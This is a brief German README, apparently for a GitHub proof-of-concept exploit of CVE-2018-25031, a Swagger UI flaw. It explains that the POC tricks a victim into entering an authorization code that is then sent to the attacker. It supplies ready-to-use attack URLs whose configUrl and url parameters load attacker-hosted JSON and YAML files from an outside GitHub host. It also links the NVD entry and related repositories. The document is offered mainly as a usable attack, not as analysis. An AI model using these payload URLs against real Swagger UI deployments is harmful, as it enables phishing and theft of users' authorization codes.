
Proof-of-Concept-Exploit für CVE-2018-25031 (Swagger UI XSS), der Autorisierungscodes über manipulierte configUrl/url-Parameter exfiltriert.
Ein einfacher POC (CVE-2018-25031), der das Opfer dazu bringt, den Autorisierungscode einzugeben, der dann an den Angreifer gesendet wird.
Sie können es mit der XSS-Schwachstelle https://github.com/VictorNS69/swagger-ui-xss verwenden.
Es ist notwendig, den Parameter zu finden und die richtige Datei zuzuweisen: für configUrl die JSON-Datei und für url die YAML-Datei.
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031